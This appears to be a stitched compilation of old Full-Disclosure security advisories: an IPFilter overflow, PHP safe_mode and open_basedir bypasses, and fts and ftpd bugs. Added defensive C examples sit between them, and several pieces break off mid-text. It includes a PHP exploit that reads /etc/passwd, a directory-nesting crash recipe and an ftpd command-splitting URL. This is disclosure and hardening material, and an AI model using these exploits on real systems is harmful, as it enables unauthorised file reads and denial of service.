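		if (*p == '%')                        /* literal percent */
			continue;
		for (;;) {                            /* flags; "=c" is strfmon's fill */
			if (*p == '=' && p[1])
				p += 2;
			else if (*p && strchr("-+ #0'^(!", *p))
				p++;
			else
				break;
		}
		long n;
		int k;
		if (*p == '*') {                      /* width from an argument */
			args++;
			p++;
		} else if ((k = parse_num(p, cap, &n)) < 0) {
			return -1;
		} else {
			p += k;
		}
		if (*p == '.') {
			p++;
			if (*p == '*') {                  /* precision from an argument */
				args++;
				p++;
			} else if ((k = parse_num(p, cap, &n)) < 0) {
				return -1;
			} else {
				p += k;
			}
		}
		if (!*p || !strchr(convs, *p))        /* a second '*' is rejected here */
			return -1;
		args++;
	}
	return args;
}
```

A printf(1) front end would call fmt_check(fmt, "diouxXeEfFgGcsb", cap) once per pass over the format and refuse to run when the result is negative or larger than the number of remaining arguments; that single comparison is what turns "%*s" 666 into a usage error instead of a strlen() on address 666.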
[Full-disclosure] IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com/
Date:
- Dis.: 05.03.2009
- Pub.: 22.05.2009
CVE: CVE-2009-1476
Risk: Low
Original URL: http://securityreason.com/achievement_securityalert/62

--- 0. Description ---

IPFilter is a software package that can be used to provide network address translation (NAT) or firewall services. It can be used either as a loadable kernel module or incorporated into your UNIX kernel; use as a loadable kernel module where possible is highly recommended. Scripts are provided to install and patch system files, as required.

ippool - user interface to the IPFilter pools

ippool is used to manage information stored in the IP pools subsystem of IPFilter. Configuration file information may be parsed and loaded into the kernel, and currently configured pools may be removed, changed or inspected.

--- 1. IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow ---

The main problem exists in lib/load_http.c. Let's look at lib/load_http.c (note char buffer[1024]):

--- lib/load_http.c ---
...
alist_t *
load_http(char *url)
{
	int fd, len, left, port, endhdr, removed;
	char *s, *t, *u, buffer[1024], *myurl;
	alist_t *a, *rtop, *rbot;
	struct sockaddr_in sin;
	struct hostent *host;

	/*
	 * More than this would just be absurd.
	 */
	if (strlen(url) > 512) {
		fprintf(stderr, "load_http has a URL > 512 bytes?!\n");
		return NULL;
	}

	fd = -1;
	rtop = NULL;
	rbot = NULL;

	sprintf(buffer, "GET %s HTTP/1.0\r\n", url);

	myurl = strdup(url);
	if (myurl == NULL)
		goto done;

	s = myurl + 7;			/* http:// */
	t = strchr(s, '/');
	if (t == NULL) {
		fprintf(stderr, "load_http has a malformed URL '%s'\n", url);
		free(myurl);
		return NULL;
	}
	*t++ = '\0';

	u = strchr(s, '@');
	if (u != NULL)
		s = u + 1;		/* AUTH */

	sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s);
...
--- lib/load_http.c ---

0. buffer[] has only 1024 bytes.
1. The URL cannot be longer than 512 bytes (only strlen(url) > 512 is rejected, so a URL of exactly 512 bytes is accepted).
2. The URL is copied into buffer here:

	sprintf(buffer, "GET %s HTTP/1.0\r\n", url);

   and the host part (s) is copied here:

	sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s);

So if the URL is 512 bytes long, i.e. "http://" followed by 504 'A' characters and "/", the following is written into buffer:

	strlen("GET  HTTP/1.0\r\n")	=   15
	strlen(url)			=  512
	strlen("Host: \r\n\r\n")	=   10
	strlen("A" x 504)		=  504
	----------------------------------------
	sum				= 1041 bytes

1041 bytes into a 1024-byte stack buffer. Any use of this function is a potential risk; programs such as "ippool" may be at risk.

--- 2. Fix ---

NetBSD fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/dist/ipf/lib/load_http.c?only_with_tag=MAIN

--- 3. Greets ---

Christos Zoulas sp3x infospec chujwamwdupe pi3 and others

--- 4. Contact ---

Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEUEARECAAYFAkoWwlMACgkQpiCeOKaYa9Z40wCg3EMaEvfUd6w+CC16Xg9LOes8
RWAAmJecg/1hNPWd6z8oAtCHKi1z/B8=
=Ku9/
-----END PGP SIGNATURE-----

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
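The byte arithmetic above carried out in code, as an added example that is not part of the advisory or of IPFilter. request_len() reproduces the number of bytes load_http() writes into buffer[] for a given URL (same host extraction: skip "http://", cut at the first '/', drop any "user:pass@" prefix), and build_request() is a bounded replacement that refuses any URL whose request would not fit rather than overflowing. The worst-case URL is constructed exactly as the advisory describes ("http://" + 504 x 'A' + "/", 512 bytes); example.com in the short-URL case is an assumption of this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024   /* load_http()'s char buffer[1024] */
#define URL_MAX  512    /* load_http() rejects only strlen(url) > 512 */

/* Bytes (without the NUL) that load_http() writes into buffer[] for url:
 * "GET " + url + " HTTP/1.0\r\n" + "Host: " + host + "\r\n\r\n". */
size_t request_len(const char *url)
{
    const char *s = url + 7;                    /* past "http://" */
    const char *t = strchr(s, '/');
    size_t hostlen = t ? (size_t)(t - s) : strlen(s);
    const char *u = memchr(s, '@', hostlen);
    if (u)
        hostlen -= (size_t)(u + 1 - s);         /* AUTH part is not sent */
    return 4 + strlen(url) + 11 + 6 + hostlen + 4;
}

/* Bounded version: snprintf() never writes past bufsz, and a request that
 * would have been truncated is reported as an error instead of silently
 * producing a broken request. Returns the request length, or -1. */
int build_request(const char *url, char *buf, size_t bufsz)
{
    char host[URL_MAX + 1];

    if (strncmp(url, "http://", 7) != 0 || strlen(url) > URL_MAX)
        return -1;
    const char *s = url + 7;
    const char *t = strchr(s, '/');
    if (t == NULL)
        return -1;                              /* malformed, as in the original */
    size_t hostlen = (size_t)(t - s);
    const char *u = memchr(s, '@', hostlen);
    if (u) {
        hostlen -= (size_t)(u + 1 - s);
        s = u + 1;
    }
    memcpy(host, s, hostlen);
    host[hostlen] = '\0';

    int n = snprintf(buf, bufsz, "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", url, host);
    if (n < 0 || (size_t)n >= bufsz)
        return -1;                              /* would not fit: refuse */
    return n;
}

/* Constructed worst case from the advisory: "http://" + 504 x 'A' + "/". */
static void worst_case_url(char url[URL_MAX + 1])
{
    memcpy(url, "http://", 7);
    memset(url + 7, 'A', 504);
    url[511] = '/';
    url[512] = '\0';
}

size_t worst_case_request_len(void)
{
    char url[URL_MAX + 1];
    worst_case_url(url);
    return request_len(url);                    /* 1041, more than BUF_SIZE */
}

int hardened_rejects_worst_case(void)
{
    char url[URL_MAX + 1], buf[BUF_SIZE];
    worst_case_url(url);
    return build_request(url, buf, sizeof buf); /* -1: refused, buffer intact */
}

int hardened_accepts_short_url(void)
{
    char buf[BUF_SIZE];
    /* example.com is an assumed host for this example */
    return build_request("http://example.com/", buf, sizeof buf); /* 55 */
}

int main(void)
{
    printf("worst-case request: %zu bytes into a %d-byte buffer\n",
           worst_case_request_len(), BUF_SIZE);
    printf("hardened builder on worst case: %d\n", hardened_rejects_worst_case());
    printf("hardened builder on short URL: %d\n", hardened_accepts_short_url());
    return 0;
}
```

The 1041 comes straight from the two sprintf() calls: the fixed text is 25 bytes, and the host appears twice (once inside the URL, once after "Host: "), so any URL whose host part is longer than roughly half of what remains in the buffer is enough; the strlen(url) > 512 guard bounds the URL, not the sum.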
[Full-disclosure] PHP 5.2.9 curl safe_mode & open_basedir bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.9 curl safe_mode & open_basedir bypass ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- Dis.: 31.12.2008
- Pub.: 10.04.2009
Original URL: http://securityreason.com/achievement_securityalert/61

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication.

--- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass ---

The main problem exists in the safe_mode & open_basedir checks for the curl functions. The path that is checked for access is not the path that the operation then uses. Example code:

	curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd");

curl first checks safe_mode and open_basedir for "file:etc/passwd" (/* realpath is ./file:/etc/passwd */), and in the next step reads "file:etc/passwd" with the wrapper stripped, i.e. /etc/passwd.

To attack, we need to cheat PHP by creating a directory tree that makes the checked path exist:

	./file:/
	./file:/etc/
	./file:/etc/passwd/

Example for /etc/hosts:

	./file:/
	./file:/etc/
	./file:/etc/hosts/

So, running the script as user X, we only have to create these subdirectories.

---EXAMPLE-EXPLOIT---
<?php
mkdir("file:");
chdir("file:");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
chdir("..");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>
---EXAMPLE-EXPLOIT---

The previous changes may have contributed to this error in PHP 5.2.9. We discourage the use of safe_mode & open_basedir as the main security mechanism.

Exploit:
http://securityreason.com/achievement_exploitalert/11

--- 2. Fix ---

Do not use safe_mode and open_basedir as the main safety mechanism.

--- 3. Greets ---

sp3x Infospec Chujwamwdupe p_e_a pi3 schain and r.i.p. ladybms

--- 4. Contact ---

Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEYEARECAAYFAknfVzEACgkQpiCeOKaYa9bB7wCfUGnETLIyNN1de0A/wwLumeAy
wHMAn3OiRiuKq9ZL4zM0YNH6ix+NSNtQ
=Hcjr
-----END PGP SIGNATURE-----
[Full-disclosure] libc:fts_*():multiple vendors, Denial-of-service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ libc: fts_*(): multiple vendors, Denial-of-service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- Dis.: 21.10.2008
- Pub.: 04.03.2009
CVE: CVE-2009-0537

We are informing all vendors about this problem.

Affected Software (official):
- OpenBSD 4.4 /usr/src/lib/libc/gen/fts.c
- Microsoft Interix 6.0 10.0.6030.0 x86
- Microsoft Vista Enterprise SearchIndexer.exe
probably more...

Original URL: http://securityreason.com/achievement_securityalert/60

--- 0. Description ---

The fts functions are provided for traversing UNIX file hierarchies. The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.

typedef struct _ftsent {
	unsigned short fts_info;	/* flags for FTSENT structure */
	char *fts_accpath;		/* access path */
	char *fts_path;			/* root path */
	size_t fts_pathlen;		/* strlen(fts_path) */
	char *fts_name;			/* file name */
	size_t fts_namelen;		/* strlen(fts_name) */
	short fts_level;		/* depth (-1 to N) */
	int fts_errno;			/* file errno */
	long fts_number;		/* local numeric value */
	void *fts_pointer;		/* local address value */
	struct _ftsent *fts_parent;	/* parent directory */
	struct _ftsent *fts_link;	/* next file structure */
	struct _ftsent *fts_cycle;	/* cycle structure */
	struct stat *fts_statp;		/* stat(2) information */
} FTSENT;

--- 1. libc: fts_*(): multiple vendors, Denial-of-service ---

The main problem is fts_level in the ftsent structure: its type is short. Let's look at /usr/src/lib/libc/gen/fts.c (OpenBSD):

---line-616-625---
	/*
	 * Figure out the max file name length that can be stored in the
	 * current path -- the inner loop allocates more path as necessary.
	 * We really wouldn't have to do the maxlen calculations here, we
	 * could do them in fts_read before returning the path, but it's a
	 * lot easier here since the length is part of the dirent structure.
	 *
	 * If not changing directories set a pointer so that can just append
	 * each new name into the path.
	 */
---line-616-625---

"We really wouldn't have to do the maxlen calculations here..." There should be some monitoring of the level or of the path length here. Should.

	short fts_level;		/* depth (-1 to N) */

fts_level is a short; it is not unbounded (no aleph-zero). Once the depth exceeds what a short can hold, the value wraps.

---line-247-249---
#define	NAPPEND(p)							\
	(p->fts_path[p->fts_pathlen - 1] == '/'				\
	    ? p->fts_pathlen - 1 : p->fts_pathlen)
---line-247-249---

This macro will crash when it accesses wrongly allocated memory. So, what goes wrong:

127# pwd
/home/cxib
127# du /home/
4	/home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
127# gdb -q du
(no debugging symbols found)
(gdb) r /home/
Starting program: /usr/bin/du /home/
4	/home/cxib/.ssh

Program received signal SIGSEGV, Segmentation fault.
0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385
385	name:		t = sp->fts_path + NAPPEND(p->fts_parent);
(gdb) print p->fts_level
$1 = -19001
(gdb) print p->fts_path
$2 = 0x837c9000

And we have the answer: fts_level has wrapped to a negative value.

The result also depends on the length of the directory names:

127# cd /home/cxib
127# mkdir len
127# cd len
127# mkdir 24
127# mkdir 23
127# mkdir 22
127# cd 22
127# perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../23/
127# perl -e '$a="C"x23;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../24/
127# perl -e '$a="C"x24;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
/* Will print correct output */

In all cases, the function should return an error, "ENAMETOOLONG". The security consequences follow from the crash of the program.

All combinations like "while (fts_read())" and the "ftw()" function constitute a potential risk.

Examples of vulnerable programs:
du
rm
chmod -R
chgrp -R

In the case of Microsoft Interix, the situati
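A defensive consumer of the fts(3) API, as an added example that is not part of the advisory or of any vendor's libc. It walks a tree with fts_read() but prunes every directory at a chosen depth with FTS_SKIP, so fts_level never climbs towards the limits of a short no matter how deep an attacker's directory chain is; this is the check a "while (fts_read())" loop in du/rm/chmod-style tools can apply on its side. The temporary tree it builds under /tmp (a six-level chain of directories named "d") is constructed for the demonstration and removed afterwards; the cap values and the /tmp location are assumptions of this example.

```c
#define _DEFAULT_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <fts.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Walk `root` with fts(3) but never descend below `max_depth`: a directory
 * whose fts_level has reached the cap is pruned with FTS_SKIP, so its
 * children are never read and fts_level (a short in the BSD FTSENT) cannot
 * grow past the cap, however deep the tree really is.
 * Returns the deepest fts_level visited (root is 0), or -1 with errno set. */
int bounded_walk(const char *root, int max_depth, long *dirs_seen)
{
    char *const argv[] = { (char *)root, NULL };
    FTS *fts = fts_open(argv, FTS_PHYSICAL | FTS_NOCHDIR, NULL);
    if (fts == NULL)
        return -1;

    int deepest = -1, err = 0;
    long n = 0;
    FTSENT *ent;
    while ((ent = fts_read(fts)) != NULL) {
        switch (ent->fts_info) {
        case FTS_D:                             /* directory, pre-order visit */
            n++;
            if (ent->fts_level > deepest)
                deepest = ent->fts_level;
            if (ent->fts_level >= max_depth)
                fts_set(fts, ent, FTS_SKIP);    /* prune: children are not read */
            break;
        case FTS_DNR: case FTS_ERR: case FTS_NS:
            err = ent->fts_errno;               /* unreadable dir / stat failure */
            break;
        default:
            break;
        }
    }
    if (errno != 0)                             /* NULL with errno set = failure */
        err = errno;
    fts_close(fts);
    if (dirs_seen)
        *dirs_seen = n;
    if (err) {
        errno = err;
        return -1;
    }
    return deepest;
}

/* Build base/d/d/.../d with `depth` levels (constructed test tree). */
static int make_chain(const char *base, int depth)
{
    char path[4096];
    snprintf(path, sizeof path, "%s", base);
    for (int i = 0; i < depth; i++) {
        strncat(path, "/d", sizeof path - strlen(path) - 1);
        if (mkdir(path, 0700) != 0)
            return -1;
    }
    return 0;
}

/* Remove the chain deepest-first, then base itself. */
static void remove_chain(const char *base, int depth)
{
    char path[4096];
    snprintf(path, sizeof path, "%s", base);
    for (int i = 0; i < depth; i++)
        strncat(path, "/d", sizeof path - strlen(path) - 1);
    for (int i = 0; i <= depth; i++) {
        rmdir(path);
        char *slash = strrchr(path, '/');
        if (slash)
            *slash = '\0';
    }
}

/* A six-level chain under a fresh mkdtemp() directory, walked with the cap.
 * Returns 3 for a cap of 3, 6 for any cap of 6 or more, -1 on setup error. */
int demo_bounded(int max_depth)
{
    char base[] = "/tmp/fts-demo-XXXXXX";
    if (mkdtemp(base) == NULL)
        return -1;
    int deepest = -1;
    if (make_chain(base, 6) == 0)
        deepest = bounded_walk(base, max_depth, NULL);
    remove_chain(base, 6);
    return deepest;
}

int main(void)
{
    printf("cap 3:   deepest level visited = %d\n", demo_bounded(3));
    printf("cap 100: deepest level visited = %d\n", demo_bounded(100));
    return 0;
}
```

fts_read() returns NULL both at the end of the hierarchy (with errno set to 0) and on failure (errno set), which is why the loop checks errno after the NULL rather than treating every NULL as success.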
[Full-disclosure] SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
- Written: 20.11.2008
- Public: 05.12.2008
SecurityReason Research SecurityAlert Id: 59
SecurityRisk: High
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/59
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://pl.php.net/manual/pl/refs.utilspec.server.php

--- 1. PHP 5.2.6 SAPI php_getuid() overload ---

Using PHP 5.2.6 as an Apache module, many security checks can be bypassed. To understand this issue, we first need to know where the problem is.

127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x  2 www  www  512 Sep 10 03:49 .
drwxr-xr-x  4 www  www  512 Sep 10 03:41 ..
-rw-r--r--  1 www  www   26 Sep 10 03:49 .htaccess
-rw-r--r--  1 www  www   33 Sep 10 03:49 not.php
-rw-r--r--  1 www  www  107 Sep 10 03:49 pufff.php
-rw-r--r--  1 www  www   27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value error_log /etc/
127# cat not.php
127# cat pufff.php
127# cat sleep.php
127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=/etc/
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=
127#

Now error_log is empty.

Example exploit:

127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=/etc/

Any new "apache child" process allows a setting such as error_log to be overridden.

127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# ps -aux -U www
USER  PID  %CPU %MEM   VSZ   RSS  TT  STAT STARTED    TIME COMMAND
www  6361  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6362  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6363  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6364  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6365  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=/etc/
127# ps -aux -U www
USER  PID  %CPU %MEM   VSZ   RSS  TT  STAT STARTED    TIME COMMAND
www  6361  0.0  0.5 18676 14288  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6362  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6363  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6364  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6365  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=
127# curl http://localhost/trafka/pufff.php
safe_mode=1 error_log=
127# ps -aux -U www
USER  PID  %CPU %MEM   VSZ   RSS  TT  STAT STARTED    TIME COMMAND
www  6361  0.0  0.5 18676 14288  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6362  0.0  0.5 18676 14288  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6363  0.0  0.5 18676 14288  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6364  0.0  0.5 18676 14288  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
www  6365  0.0  0.5 18676 14288  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd
127#

So what is wrong? Let's try to understand this problem. Let's start with the difference between

www  6361  0.0  0.5 18676 14248  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd

and

www  6361  0.0  0.5 18676 14288  ??  S    4:01AM  0:00.00 /usr/local/sbin/httpd

RSS: 14288 - 14248 = 40. A memory leak? No. In the first request we declared error_log via .htaccess.

--- main/main.c ---
...
	STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
[Full-disclosure] SecurityReason : PHP 5.2.6 dba_replace() destroying file
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]

Author: Maksymilian Arciemowicz
http://securityreason.com
Date:
- Written: 10.11.2008
- Public: 28.11.2008
SecurityReason Research SecurityAlert Id: 58
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/58
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

NOTE: These functions build the foundation for accessing Berkeley DB style databases.

dba_replace - Replace or insert entry

--- 1. dba_replace() destroying file ---

The dba_replace() function does not filter the key and value strings. It is therefore possible to destroy the file.

# cat /www/dba.hack.php
# cat /www/about.ini
PATH=/
CURR=.
HOME=/home/
# php /www/dba.hack.php
# cat /www/about.ini
PATH=/
CURR=.
HOME=/www/
#

Well. But let's try this one:

# cat /www/dba.ham.php
# php /www/dba.ham.php
# cat /www/about.ini
#

Now /www/about.ini is empty.

--- 2. How to fix ---

Fixed in CVS:
http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314

--- 3. Greets ---

sp3x p_e_a Infospec schain

--- 4. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ]
Email: cxib [ a t] securityreason [d ot ] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEYEARECAAYFAkkvKDcACgkQpiCeOKaYa9aRUgCgmsbU4uKeq1E+/yyIlQas9V14
e2MAoJobXQNRD8BNiDsHQYSNdOxIyQRc
=Tb8r
-----END PGP SIGNATURE-----
[Full-disclosure] SecurityReason : PHP 5.2.6 (error_log) safe_mode bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.11.2008
- Public: 20.11.2008
SecurityReason Research SecurityAlert Id: 57
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

error_log

These settings allow you to define your own error handling rules, as well as modify the way the errors are logged. This allows you to change and enhance error reporting to suit your needs.

--- 0. error_log const. bypassed by php_admin_flag ---

The main problem is the difference between enabling safe_mode globally in php.ini:

	safe_mode = On

and enabling it via php_admin_flag in httpd.conf:

	php_admin_flag safe_mode On

When we create some PHP script in /www/ and try to call:

	ini_set("error_log", "/hack/");

or put in /www/.htaccess:

	php_value error_log "/hack/bleh.php"

Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

That was with safe_mode declared in php.ini. But if we use "php_admin_flag safe_mode On" in httpd.conf, we get only:

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

The .htaccess syntax

	php_value error_log "/hack/blehx.php"

is allowed and bypasses safe_mode.

Example exploit:

	error_log("", 0);

--- 2. How to fix ---

Fixed in CVS:
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note: Do not use safe_mode as the main safety mechanism.

--- 3. Greets ---

sp3x Infospec schain p_e_a pi3

--- 4. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (FreeBSD)

iEYEARECAAYFAkklRdcACgkQpiCeOKaYa9bh0gCeN8rn2nWY0YUJ7QHmnxfD5TAe
8hgAmwV0vc0Mk7rIUY5KJezctW589ydy
=zM1X
-----END PGP SIGNATURE-----
[Full-disclosure] multiple vendor ftpd - Cross-site request forgery
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ multiple vendor ftpd - Cross-site request forgery ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
- Written: 03.09.2008
- Public: 26.09.2008
SecurityReason Research SecurityAlert Id: 56
CVE: not assigned
SecurityRisk: Low
Affected Software: This problem has been discovered on OpenBSD 4.3.
- Affected systems:
  + OpenBSD
  + NetBSD
  + FreeBSD
  + some Linux
- Affected applications:
  + proFTPd
  + others
Advisory URL: http://securityreason.com/achievement_securityalert/56

--- 0. Description ---

ftpd -- Internet File Transfer Protocol server

The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP protocol and listens at the port specified with the -P option or in the ``ftp'' service specification; see services(5).

Cross-site request forgery, also known as one click attack, sidejacking or session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user the website trusts. Contrary to cross-site scripting (XSS), which exploits the trust a user has for a particular site, cross-site request forgery exploits the trust that a site has for a particular user.
http://en.wikipedia.org/wiki/Cross-site_request_forgery

--- 1. ftpd bsd - Cross-site request forgery ---

The main problem exists in the splitting of one long command into several others. It stems from the use of a for(;;) loop around fgets(): a command line longer than the read buffer is returned in pieces, and every piece is treated as a command of its own.

Example: the command

	AA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA

will be split into

	500 'AA AAA AAA AAA AAA AAA AA': command not understood.
	500 'AA AAA AAA AAA AAA AAA AA'

When we make a request to the ftp daemon via a browser and the path is longer than 512 bytes, our URL is split.

/* FreeBSD 7.0 */
ftp://[EMAIL PROTECTED]///SYST

returns the result of the SYST command:

215 UNIX Type: L8 Version: BSD-199506

/* NetBSD 4.0 */
ftp://ftp.netbsd.org///SYST

returns the result of the SYST command:

215 UNIX Type: L8 V
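The splitting behaviour described above, as an added example that is not part of the advisory or of any ftpd. read_commands_fgets() reproduces a for(;;)/fgets() command loop over a fixed 512-byte buffer, and read_commands_strict() is the defensive variant that drains and rejects an over-long line instead of dispatching its tail as a second command. Both read from an in-memory stream built from a constructed client input: one 517-byte line whose first 511 bytes are "CWD " plus 507 'A' characters and whose remainder is "SYST\r\n", so the buffer boundary falls exactly in front of SYST. The buffer size and the stand-in dispatcher are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

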